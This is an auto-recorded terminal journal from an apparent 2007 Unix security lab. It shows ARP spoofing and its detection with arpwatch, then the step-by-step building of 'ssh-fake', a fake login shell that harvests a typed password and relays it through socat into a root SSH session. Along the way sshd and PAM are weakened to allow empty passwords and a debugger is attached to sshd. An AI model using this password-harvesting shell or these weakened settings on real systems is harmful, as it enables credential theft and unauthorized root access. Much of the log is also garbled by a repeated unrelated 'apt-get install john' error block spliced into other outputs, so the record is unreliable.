[ править ]

Журнал лабораторных работ

Содержание

Журнал

Четверг (06/21/07)

Файлы
Статистика
Справка
О программе

Журнал

Четверг (06/21/07)

/dev/pts/5

15:22:58

#arp -an

[user@linux3:~]$
[user@linux3:~]$
[user@linux3:~]$
[user@linux3:~]$
[user@linux3:~]$
[user@linux3:~]$
[user@linux3:~]$ su
Password:
          ? (192.168.15.254) at 00:0A:01:D4:D1:39 [ether] on eth0
? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0

15:23:05

#arp -an

 GROUP 1 : 192.168.15.201 00:04:75:75:46:B1
 GROUP 2 : 192.168.15.254 00:0A:01:D4:D1:39
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
? (192.168.15.254) at 00:0A:01:D4:D1:E3 [ether] on eth0
? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0

15:23:31

#arp -an

[root@linux2:~]# arp -an
? (192.168.15.254) at 00:0A:01:D4:D1:39 [ether] on eth0
? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0
[root@linux2:~]# arp -an
? (192.168.15.254) at 00:0A:01:D4:D1:E3 [ether] on eth0
? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0
[root@linux2:~]# arp -an
? (192.168.15.254) at 00:0A:01:D4:D1:E3 [ether] on eth0
? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0
[root@linux2:~]#
                 ? (192.168.15.254) at 00:0A:01:D4:D1:E3 [ether] on eth0
? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0

15:23:41

#nc 192.168.15.254 110

.
[root@linux2:~]#
                 +OK
USER user
+OK
PASS password
+OK
LIST
+OK
.

15:24:33

#arp -an

PASS password
+OK
LIST
+OK
.
[root@linux2:~]# arp -an
? (192.168.15.254) at 00:0A:01:D4:D1:39 [ether] on eth0
? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0
[root@linux2:~]#
                 ? (192.168.15.254) at 00:0A:01:D4:D1:39 [ether] on eth0
? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0

15:24:45

#tcpdump -i eth0 arp

08:34:20.231680 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui Unknown)
08:34:21.259637 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui Unknown)
08:34:22.287591 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui Unknown)
08:34:23.315522 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui Unknown)
08:34:32.463255 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:39 (oui Unknown)
08:34:33.491040 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:39 (oui Unknown)
08:34:34.514988 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:39 (oui Unknown)
11 packets captured
11 packets received by filter
0 packets dropped by kernel

15:34:40

#apt

[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
bash: apt: command not found

15:36:22

#apt-get install arpwatch

0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 124kB of archives.
After unpacking 389kB of additional disk space will be used.
Get:1 http://debian.ZLO.ZLO.ZLO etch/main arpwatch 2.1a13-2 [124kB]
Fetched 124kB in 0s (177kB/s)
Selecting previously deselected package arpwatch.
(Reading database ... 22406 files and directories currently installed.)
Unpacking arpwatch (from .../arpwatch_2.1a13-2_i386.deb) ...
Setting up arpwatch (2.1a13-2) ...
Starting Ethernet/FDDI station monitor daemon: (chown arpwatch /var/lib/arpwatch/arp.dat) arpwatch.

15:36:35

#ps aux | grep arpwatch

arpwatch  4810  0.5  0.4   3448  2360 ?        S    08:36   0:00 /usr/sbin/arpwatch -u arpwatch -N -p
root      4827  0.0  0.1   2852   712 pts/6    R+   08:36   0:00 grep arpwatch

15:36:40

#vi /etc/default/arpwatch

15:36:53

#cat /etc/default/arpwatch

# Global options for arpwatch(8).
# Debian: don't report bogons, don't use PROMISC.
ARGS="-N -p"
# Debian: run as `arpwatch' user.  Empty this to run as root.
RUNAS="arpwatch"

15:36:55

#tail -f /var/log/daemon.log

Jun 21 08:37:08 s_all@linux2 arpwatch: new station 192.168.15.200 0:a:1:d4:d1:e3 eth0
Jun 21 08:37:08 s_all@linux2 arpwatch: new station 192.168.15.201 0:4:75:75:46:b1 eth0
Jun 21 08:37:09 s_all@linux2 arpwatch: new station 192.168.15.254 0:a:1:d4:d1:39 eth0
Jun 21 08:37:09 s_all@linux2 arpwatch: changed ethernet address 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0
Jun 21 08:37:11 s_all@linux2 arpwatch: ethernet mismatch 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0
Jun 21 08:37:12 s_all@linux2 arpwatch: ethernet mismatch 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0
Jun 21 08:37:13 s_all@linux2 arpwatch: ethernet mismatch 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0

15:37:45

#arp -an

[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
? (192.168.15.254) at 00:0A:01:D4:D1:39 [ether] on eth0
? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0

прошло 46 минут

16:24:44

#exit

exit
Connection to linux3.unix.nt closed.
slavrenyuk@linux2:~$ exit
logout

16:32:56

#tcsetattr: Input/output error

tcsetattr: Input/output error

16:35:12

#tcsetattr: Input/output error

tcsetattr: Input/output error

прошло 73 минуты

/dev/tty3

17:48:53

#ping linux3

PING linux3.unix.nt (192.168.15.200) 56(84) bytes of data.
64 bytes from 192.168.15.200: icmp_seq=1 ttl=64 time=0.190 ms
--- linux3.unix.nt ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.190/0.190/0.190/0.000 ms

17:49:10

#ping linux3

PING linux3.unix.nt (192.168.15.200) 56(84) bytes of data.
64 bytes from 192.168.15.200: icmp_seq=1 ttl=64 time=0.188 ms
--- linux3.unix.nt ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.188/0.188/0.188/0.000 ms

17:49:24

#man ping

17:49:46

#ping -a linux3

Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
PING linux3.unix.nt (192.168.15.200) 56(84) bytes of data.

прошло 16 минут

18:06:42

#apt-get install nessus

  libgd2-noxpm libgdchart-gd2-noxpm libnessus2 nessus
0 upgraded, 4 newly installed, 0 to remove and 0 not upgraded.
Need to get 566kB of archives.
After unpacking 1597kB of additional disk space will be used.
Do you want to continue [Y/n]? y
Get:1 http://debian.ZLO.ZLO.ZLO etch/main libgd2-noxpm 2.0.33-5.2 [197kB]
Get:2 http://debian.ZLO.ZLO.ZLO etch/main libgdchart-gd2-noxpm 0.11.5-3 [39.9kB]
Get:3 http://debian.ZLO.ZLO.ZLO etch/main libnessus2 2.2.8-2 [97.6kB]
Get:4 http://debian.ZLO.ZLO.ZLO etch/main nessus 2.2.8-1 [231kB]
Fetched 566kB in 4s (117kB/s)
...
Selecting previously deselected package libgdchart-gd2-noxpm.
Unpacking libgdchart-gd2-noxpm (from .../libgdchart-gd2-noxpm_0.11.5-3_i386.deb) ...
Selecting previously deselected package libnessus2.
Unpacking libnessus2 (from .../libnessus2_2.2.8-2_i386.deb) ...
Selecting previously deselected package nessus.
Unpacking nessus (from .../nessus_2.2.8-1_i386.deb) ...
Setting up libgd2-noxpm (2.0.33-5.2) ...
Setting up libgdchart-gd2-noxpm (0.11.5-3) ...
Setting up libnessus2 (2.2.8-2) ...
Setting up nessus (2.2.8-1) ...

прошло 54 минуты

/dev/pts/5

19:00:52

#ssh 127.0.0.1

The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
RSA key fingerprint is a5:a0:26:ce:b5:a1:f9:eb:d9:59:8b:f5:77:cf:55:42.
Are you sure you want to continue connecting (yes/no)? no
Host key verification failed.

19:01:21

#ssh-keygen -lf /etc/ssh/ssh_

[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
ssh_config            ssh_host_dsa_key.pub  ssh_host_rsa_key.pub
ssh_host_dsa_key      ssh_host_rsa_key

19:01:21

#ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub

[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
2048 a5:a0:26:ce:b5:a1:f9:eb:d9:59:8b:f5:77:cf:55:42 /etc/ssh/ssh_host_rsa_key.pub

19:02:01

#ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub

2048 a5:a0:26:ce:b5:a1:f9:eb:d9:59:8b:f5:77:cf:55:42 /etc/ssh/ssh_host_rsa_key.pub

19:02:01

#man ssh

19:04:08

#man ssh

19:04:45

#ls /etc/ssh/

moduli      sshd_config       ssh_host_dsa_key.pub  ssh_host_rsa_key.pub
ssh_config  ssh_host_dsa_key  ssh_host_rsa_key

19:04:47

#ls -l /etc/ssh/

total 140
-rw-r--r-- 1 root root 132777 2007-03-05 11:38 moduli
-rw-r--r-- 1 root root   1424 2007-03-05 11:38 ssh_config
-rw-r--r-- 1 root root   1874 2007-06-19 06:13 sshd_config
-rw------- 1 root root    672 2007-06-19 06:13 ssh_host_dsa_key
-rw-r--r-- 1 root root    601 2007-06-19 06:13 ssh_host_dsa_key.pub
-rw------- 1 root root   1671 2007-06-19 06:13 ssh_host_rsa_key
-rw-r--r-- 1 root root    393 2007-06-19 06:13 ssh_host_rsa_key.pub

19:04:50

#vi ssh-fake

19:10:53

#useradd -m slavrenyuk

==================================================
[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate

19:10:59

#passwd slavrenyuk

Enter new UNIX password:
Retype new UNIX password:
No password supplied
Enter new UNIX password:
Retype new UNIX password:
No password supplied
Enter new UNIX password:
Retype new UNIX password:
No password supplied
passwd: Authentication token manipulation error
passwd: password unchanged

19:11:13

#vi /etc/passwd

25c25
< slavrenyuk:x:1002:1002::/home/slavrenyuk:/bin/sh
---
> slavrenyuk::1002:1002::/home/slavrenyuk:/bin/sh

19:11:20

#vi /etc/ssh/sshd_config

43c43
< PermitEmptyPasswords no
---
> PermitEmptyPasswords yes

19:11:33

#ssh slavrenyuk@127.0.0.1

This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
RSA key fingerprint is a5:a0:26:ce:b5:a1:f9:eb:d9:59:8b:f5:77:cf:55:42.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (RSA) to the list of known hosts.
slavrenyuk@127.0.0.1's password:
Permission denied, please try again.
slavrenyuk@127.0.0.1's password:

19:11:46

#/etc/init.d/ssh restart

Restarting OpenBSD Secure Shell server: sshd.

19:11:50

#ssh slavrenyuk@127.0.0.1

slavrenyuk@127.0.0.1's password:
Permission denied, please try again.
slavrenyuk@127.0.0.1's password:
Permission denied, please try again.
slavrenyuk@127.0.0.1's password:
Permission denied (publickey,password).

19:12:17

#apt-get install gdb

Reading package lists... Done
Building dependency tree... Done
Suggested packages:
  gdb-doc
The following NEW packages will be installed:
  gdb
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 2411kB of archives.
After unpacking 5181kB of additional disk space will be used.
Get:1 http://debian.ZLO.ZLO.ZLO etch/main gdb 6.4.90.dfsg-1 [2411kB]
Fetched 2411kB in 12s (192kB/s)
Selecting previously deselected package gdb.
(Reading database ... 22431 files and directories currently installed.)
Unpacking gdb (from .../gdb_6.4.90.dfsg-1_i386.deb) ...
Setting up gdb (6.4.90.dfsg-1) ...

19:12:59

#ps aux | grep sshd

root      4499  0.0  0.4   7700  2364 ?        Ss   08:22   0:00 sshd: root@pts/5
root      5662  0.0  0.2   4928  1092 ?        Ss   12:11   0:00 /usr/sbin/sshd
root      5723  0.0  0.1   2852   704 pts/6    R+   12:13   0:00 grep sshd

19:13:14

#gdb

GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
(gdb) attach 5662
Attaching to process 5662
Reading symbols from /usr/sbin/sshd...(no debugging symbols found)...done.
...
Loaded symbols for /lib/tls/i686/cmov/libnss_compat.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_nis.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_nis.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_files.so.2...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_files.so.2
Failed to read a valid object file image from memory.
0xb7f93410 in ?? ()
(gdb) detach
Detaching from program: /usr/sbin/sshd, process 5662

19:13:40

#vi /etc/passwd

25c25
< slavrenyuk::1002:1002::/home/slavrenyuk:/bin/sh
---
> slavrenyuk:x:1002:1002::/home/slavrenyuk:/bin/sh

19:14:17

#vi /etc/pam.d/passwd

19:14:29

#vi /etc/pam.d/common-password

17c17
< password   required   pam_unix.so nullok obscure min=4 max=8 md5
---
> #password   required   pam_unix.so nullok obscure min=4 max=8 md5

19:14:41

#passwd slavrenyuk

passwd: Permission denied
passwd: password unchanged

19:14:49

#vi /etc/pam.d/common-password

17c17
< #password   required   pam_unix.so nullok obscure min=4 max=8 md5
---
> password   required   pam_unix.so nullok #obscure min=4 max=8 md5

19:15:11

#passwd slavrenyuk

Enter new UNIX password:
Retype new UNIX password:
No password supplied
Enter new UNIX password:
Retype new UNIX password:
No password supplied
Enter new UNIX password:
Retype new UNIX password:
No password supplied
passwd: Authentication token manipulation error
passwd: password unchanged

19:15:14

#man passwd

19:15:23

#passwd -d slavrenyuk

Password changed.

19:15:28

#ssh slavrenyuk@127.0.0.1

slavrenyuk@127.0.0.1's password:
Permission denied, please try again.
slavrenyuk@127.0.0.1's password:

19:16:21

#trap true 2

19:16:35

#vi /etc/ssh/sshd_config

77c77
< UsePAM yes
---
> UsePAM no

19:17:03

#/etc/init.d/ssh restart

Restarting OpenBSD Secure Shell server: sshd.

19:17:58

#ssh slavrenyuk@127.0.0.1

[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
slavrenyuk@linux2:~$ exit
logout
Connection to 127.0.0.1 closed.

19:19:04

#ls

0_hfile_469_1.doc          phpsyslogng-2.6.tar.gz  ssh-fake
phpsyslogng-2.6(2).tar.gz  prilozenie_1_4.doc      Tablitsa_1_1.xls

19:19:06

#pwd

/root

19:19:10

#ls -ld /root

[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
drwxr-xr-x 8 root root 1024 2007-06-21 12:10 /root

19:19:13

#vi /etc/shells

12a13
> /root/ssh-fake

19:19:27

#chmod +x /root/ssh-fake

19:19:31

#usermod -s /root/ssh-fake slavrenyuk

==================================================
[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate

19:19:47

#ssh slavrenyuk@127.0.0.1

Last login: Thu Jun 21 12:18:53 2007 from localhost
Password:
Connection to 127.0.0.1 closed.

19:20:25

#touch /home/slavrenyuk/.hushlogin

19:20:41

#ssh slavrenyuk@127.0.0.1

Password:rrrrrr
Connection to 127.0.0.1 closed.

19:21:07

#vi ssh-fake

3a4
> stty -echo
5c6
< #echo $password | socat - ssh ...
---
> #echo $password | socat - EXEC:'ssh linux2.unix.nt

19:22:34

#vi ssh-fake

6c6
< #echo $password | socat - EXEC:'ssh linux2.unix.nt
---
> #echo $password | socat - EXEC:'ssh linux3.unix.nt',setsid,pty,ctty

19:23:09

#vi ssh-fake

6c6
< #echo $password | socat - EXEC:'ssh linux3.unix.nt',setsid,pty,ctty
---
> echo $password | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty

19:23:53

#ssh root@linux3.unix.nt

The authenticity of host 'linux3.unix.nt (192.168.15.200)' can't be established.
RSA key fingerprint is 40:6d:57:38:48:78:b2:fa:44:2f:f7:6d:da:9f:86:1f.
Are you sure you want to continue connecting (yes/no)? no
Host key verification failed.

19:24:06

#vi ssh-fake

19:24:21

#usermod -s /bin/bash slavrenyuk

==================================================
[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate

19:24:29

#su - lavrenyuk

Unknown id: lavrenyuk

19:24:32

#su - slavrenyuk

slavrenyuk@linux2:~$ ssh root@linux3.unix.nt
The authenticity of host 'linux3.unix.nt (192.168.15.200)' can't be established.
RSA key fingerprint is 40:6d:57:38:48:78:b2:fa:44:2f:f7:6d:da:9f:86:1f.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'linux3.unix.nt,192.168.15.200' (RSA) to the list of known hosts.
root@linux3.unix.nt's password:
Last login: Thu Jun 21 16:01:31 2007 from linux1.local
Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid

19:24:59

#usermod -s /root/ssh-fake slavrenyuk

19:25:06

#ssh slavrenyuk@127.0.0.1

Password:/root/ssh-fake: line 6: socat: command not found
Connection to 127.0.0.1 closed.

19:25:19

#apt-get install socat

Reading package lists... Done
Building dependency tree... Done
The following NEW packages will be installed:
  socat
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 213kB of archives.
After unpacking 614kB of additional disk space will be used.
Get:1 http://debian.ZLO.ZLO.ZLO etch/main socat 1.4.3.1-1 [213kB]
Fetched 213kB in 0s (2692kB/s)
Selecting previously deselected package socat.
(Reading database ... 22450 files and directories currently installed.)
Unpacking socat (from .../socat_1.4.3.1-1_i386.deb) ...
Setting up socat (1.4.3.1-1) ...

19:25:27

#ssh slavrenyuk@127.0.0.1

Password:123
Connection to 127.0.0.1 closed.

19:25:31

#vi ssh-fake

5a6
> stty echo

19:26:14

#./ssh-fake

Password:123
The authenticity of host 'linux3.unix.nt (192.168.15.200)' can't be established.
RSA key fingerprint is 40:6d:57:38:48:78:b2:fa:44:2f:f7:6d:da:9f:86:1f.

19:26:23

#vi ssh-fake

7c7
< echo $password | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty
---
> ( sleep 2 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty

19:27:07

#ssh slavrenyuk@127.0.0.1

[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
Password:123
Connection to 127.0.0.1 closed.

19:27:29

#ssh root@linux3.unix.nt

The authenticity of host 'linux3.unix.nt (192.168.15.200)' can't be established.
RSA key fingerprint is 40:6d:57:38:48:78:b2:fa:44:2f:f7:6d:da:9f:86:1f.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'linux3.unix.nt' (RSA) to the list of known hosts.
root@linux3.unix.nt's password:

19:27:58

#vi ssh-fake

7c7
< ( sleep 2 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty
---
> ( sleep 4 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty

19:28:10

#vi ssh-fake

19:28:47

#./ssh-fake

[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
Password:123

19:29:04

#( sleep 4 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid

==================================================
[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate

19:29:04

#( sleep 4 ; echo ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty

==================================================
[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate

19:29:04

#( sleep 4 ; echo 123

19:29:04

#( sleep 4 ; echo 123 ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,c

[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
ty
123

19:31:02

#./ssh-fake

19:31:02

#( sleep 4 ; echo 123 ; sleep 2; id; sleep 1; exit;) | socat - EXEC:'ssh roo

@lin
123
root@linux3.unix.nt's password:

19:32:51

#( sleep 6

@linux3.unix.nt',setsid,pty,ctty
root@linux3.unix.nt's password:
Last login: Thu Jun 21 16:30:46 2007 from linux3.unix.nt
Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid

19:33:28

#( sleep 6 ; echo 123 ; sleep 2; ) | socat - EXEC:'ssh root@linux3.unix.nt',

==================================================
[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate

19:33:28

#( sleep 6 ; echo 123 ; sleep 2; echo hostname; sleep 1; echo exit;) | socat

- EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty
root@linux3.unix.nt's password:
Last login: Thu Jun 21 16:32:54 2007 from 192.168.15.201
Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid
hostname

19:34:24

#( sleep 6 ; echo 123 ; sleep 2; echo hostname; sleep 1; echo exit;) | socat

19:34:24

#( sleep 6 ; echo 123 ; sleep 2; echo hostname; ) | socat - EXEC:'ssh root@l

root@linux3.unix.nt's password:
Last login: Thu Jun 21 16:34:09 2007 from 192.168.15.201
Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid

19:35:45

#vi ssh-fake

7c7
< ( sleep 4 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty
---
> ( sleep 6 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty

19:36:33

#( sleep 4

19:36:33

#./ssh-fake

19:36:33

#ssh slavrenyuk@127.0.0.1

Password:root@linux3.unix.nt's password:
Last login: Thu Jun 21 16:35:10 2007 from 192.168.15.201
Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid
tcsetattr: Input/output error
tcsetattr: Input/output error
Connection to 127.0.0.1 closed.

19:36:56

#vi ssh-fake

7c7,8
< ( sleep 6 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty
---
> echo
> ( sleep 6 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty | sed '1,1d'

19:37:44

#ssh slavrenyuk@127.0.0.1

Password:
Last login: Thu Jun 21 16:36:43 2007 from 192.168.15.201
Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid
tcsetattr: Input/output error
tcsetattr: Input/output error
Connection to 127.0.0.1 closed.

19:37:53

#pwd

[root@linux3:user]# apt-get install john
Reading package lists... Done
Building dependency tree... Done
Package john is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package john has no installation candidate
/root

19:38:37

#ls

0_hfile_469_1.doc          phpsyslogng-2.6.tar.gz  ssh-fake
phpsyslogng-2.6(2).tar.gz  prilozenie_1_4.doc      Tablitsa_1_1.xls

Файлы

/etc/default/arpwatch

# Global options for arpwatch(8).
# Debian: don't report bogons, don't use PROMISC.
ARGS="-N -p"
# Debian: run as `arpwatch' user.  Empty this to run as root.
RUNAS="arpwatch"

Статистика

Время первой команды журнала 15:22:58 2007- 6-21

Время последней команды журнала 19:38:37 2007- 6-21

Количество командных строк в журнале 101

Процент команд с ненулевым кодом завершения, % 10.89

Процент синтаксически неверно набранных команд, % 1.98

Суммарное время работы с терминалом ^*, час 1.35

Количество командных строк в единицу времени, команда/мин 1.25

Частота использования команд

`vi`	20	\|===============\| 15.15%
`ssh`	14	\|==========\| 10.61%
`(`	11	\|========\| 8.33%
`echo`	9	\|======\| 6.82%
`socat`	8	\|======\| 6.06%
`sleep`	5	\|===\| 3.79%
`)`	5	\|===\| 3.79%
`ls`	5	\|===\| 3.79%
`arp`	5	\|===\| 3.79%
`man`	4	\|===\| 3.03%
`passwd`	4	\|===\| 3.03%
`apt-get`	4	\|===\| 3.03%
`ssh-fake`	4	\|===\| 3.03%
`ping`	3	\|==\| 2.27%
`ssh-keygen`	3	\|==\| 2.27%
`usermod`	3	\|==\| 2.27%
`/etc/init.d/ssh`	2	\|=\| 1.52%
`ps`	2	\|=\| 1.52%
`pwd`	2	\|=\| 1.52%
`grep`	2	\|=\| 1.52%
`tcsetattr:`	2	\|=\| 1.52%
`exit`	2	\|=\| 1.52%
`su`	2	\|=\| 1.52%
`gdb`	1	\|\| 0.76%
`chmod`	1	\|\| 0.76%
`useradd`	1	\|\| 0.76%
`cat`	1	\|\| 0.76%
`touch`	1	\|\| 0.76%
`tcpdump`	1	\|\| 0.76%
`nc`	1	\|\| 0.76%
`id`	1	\|\| 0.76%
`trap`	1	\|\| 0.76%
`tail`	1	\|\| 0.76%
`apt`	1	\|\| 0.76%

____
*) Интервалы неактивности длительностью 30 минут и более не учитываются

Справка

Для того чтобы использовать LiLaLo, не нужно знать ничего особенного: всё происходит само собой. Однако, чтобы ведение и последующее использование журналов было как можно более эффективным, желательно иметь в виду следующее:

В журнал автоматически попадают все команды, данные в любом терминале системы.
Для того чтобы убедиться, что журнал на текущем терминале ведётся, и команды записываются, дайте команду w. В поле WHAT, соответствующем текущему терминалу, должна быть указана программа script.
Команды, при наборе которых были допущены синтаксические ошибки, выводятся перечёркнутым текстом:
$ l s-l

bash: l: command not found
Если код завершения команды равен нулю, команда была выполнена без ошибок. Команды, код завершения которых отличен от нуля, выделяются цветом.
$ test 5 -lt 4
Обратите внимание на то, что код завершения команды может быть отличен от нуля не только в тех случаях, когда команда была выполнена с ошибкой. Многие команды используют код завершения, например, для того чтобы показать результаты проверки

Команды, ход выполнения которых был прерван пользователем, выделяются цветом.

$ find / -name abc

find: /home/devi-orig/.gnome2: Keine Berechtigung find: /home/devi-orig/.gnome2_private: Keine Berechtigung find: /home/devi-orig/.nautilus/metafiles: Keine Berechtigung find: /home/devi-orig/.metacity: Keine Berechtigung find: /home/devi-orig/.inkscape: Keine Berechtigung ^C

